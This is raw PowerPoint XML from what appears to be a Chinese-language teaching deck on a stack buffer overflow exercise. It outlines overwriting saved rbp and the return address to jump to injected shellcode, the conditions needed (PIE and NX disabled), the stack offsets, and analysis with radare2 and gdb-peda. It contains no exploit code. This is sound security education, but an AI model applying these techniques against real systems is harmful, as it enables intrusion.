        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3326906" y="977369"/>
            <a:ext cx="3983856" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>buffer overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> 一直蓋到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>saved rbp</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="文字方塊 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DC26EC2-3900-44AF-AAFC-BAE2D836A98B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5905867" y="4536631"/>
            <a:ext cx="3983857" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>將</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>shell code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>注入到程式可執行區段</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="直線單箭頭接點 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0C5D2F9-8E25-47B4-9CDA-0B758170A204}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2926601" y="4715539"/>
            <a:ext cx="3013543"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4791FF3E-65F8-4F72-A70F-B6DA2CC6835C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="632534" y="5030511"/>
            <a:ext cx="6094520" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>return address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>處填入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>shell code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>位址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="文字方塊 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1C912B8-7234-468E-A89B-EF1F575EFFAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="747944" y="401719"/>
            <a:ext cx="9141780" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>攻擊條件 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1800" dirty="0"/>
              <a:t> 程式編譯時必須是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
              <a:t>PIE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
              <a:t>disable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>且關閉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
              <a:t>nx</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="文字方塊 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D0B2DE5-433F-490B-BBDD-045E5FEBF852}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5657671"/>
            <a:ext cx="9969623" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>關鍵點</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0"/>
              <a:t>(1)Buffer overflow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>蓋多少</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0"/>
              <a:t>(2)shell code?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0"/>
              <a:t>(3)Shell code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>要注入到哪裡</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>開始位址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>要寫入到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0"/>
              <a:t>RETURN ADDRESS)?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="圖片 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91F3DE46-00A8-47AC-9B6D-E098E799B648}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7310762" y="89918"/>
            <a:ext cx="2114845" cy="1362265"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="579964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804003-9CC9-4840-B3FC-C296CCD14505}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>程式行為</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="圖片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{875A4248-FF41-4294-8906-305D87127052}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1202919" y="3700977"/>
            <a:ext cx="5144218" cy="657317"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="圖片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E34DFA2E-113C-44AB-A947-AB0A8B42C7B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1202919" y="1994812"/>
            <a:ext cx="8364117" cy="1162212"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文字方塊 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92E7EF74-965C-4286-855C-9439FC7074C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1202522" y="4413967"/>
            <a:ext cx="7364429" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>有兩個輸入 一個輸入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>shell code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>一個輸入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>buffer overflow</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4214707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47CA75-532A-41C1-BCB9-CCAFD0A46048}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>逆向分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7946633-82DD-4916-AB3D-EDF02092A0E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4000" dirty="0"/>
              <a:t>static analysis == &gt; radare2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4000" dirty="0"/>
              <a:t>dynamic analysis == &gt; gdb-peda</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4256587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71D238-5762-44FE-B631-842A12B2A8E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" cap="none" dirty="0"/>
              <a:t>static analysis == &gt; radare2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" cap="none" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1395FE2-E827-406D-B2A5-EECB445D1CF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="圖片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACD951D1-11B1-431A-9497-6CD3A4CE7476}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1202919" y="2011680"/>
            <a:ext cx="6830378" cy="4401164"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1183303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92D1D726-A1FD-4F21-A84C-6CE8B6666F9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7771678" y="999122"/>
            <a:ext cx="3595163" cy="3666057"/>
            <a:chOff x="4968681" y="1971417"/>
            <a:chExt cx="3595163" cy="3666057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F871CAB8-8F46-417F-9034-0DCBEF636967}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6385187" y="5009321"/>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RETURN ADDRESS</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{687D9B0F-AED3-490F-9AF3-A26BDE477C8E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6385187" y="4335936"/>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Saved </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
                <a:t>rbp</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="矩形 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C590C100-2542-4B76-B8F3-EB80F217844B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6385185" y="1971417"/>
              <a:ext cx="2178657" cy="23192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sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="矩形 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C318E4A7-F2B2-4F4C-9C8B-F4AB31C9A46F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5212398" y="2970888"/>
              <a:ext cx="987771" cy="584775"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
                <a:t>0x20</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="矩形 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EB2FFE5-E04B-45D2-818A-B4BA88AF3AF7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5316592" y="4290704"/>
              <a:ext cx="779381" cy="584775"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
                <a:t>0x8</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="8" name="直線接點 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6F2945C-CE91-41DA-95A1-4F1FE3F20C6C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4968682" y="1993440"/>
              <a:ext cx="137372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EB1B5E52-1EA4-4228-869F-BDE7B6EA335B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4968681" y="4290704"/>
              <a:ext cx="137372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C8256E61-3CD7-483A-AFF4-76BD95B8B5CA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4968681" y="4959875"/>
              <a:ext cx="137372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12" name="圖片 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F36EDFF-9BCF-4C5C-9A0D-61220D1587A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="458828" y="999122"/>
            <a:ext cx="6354062" cy="4686954"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="矩形 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81FF2568-E30E-477F-8CFF-5A004A70C5A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="458828" y="1740023"/>
            <a:ext cx="3704799" cy="26633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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F858EFC6-6F6E-4DB5-B223-ECF6B178B856}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="13" idx="3"/>
            <a:endCxn id="5" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4163627" y="1873188"/>
            <a:ext cx="5024555" cy="2855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05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EA9483B-9DF5-4C8A-83A8-CEBFB03BDD9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="244806" y="1433234"/>
            <a:ext cx="5630061" cy="3991532"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
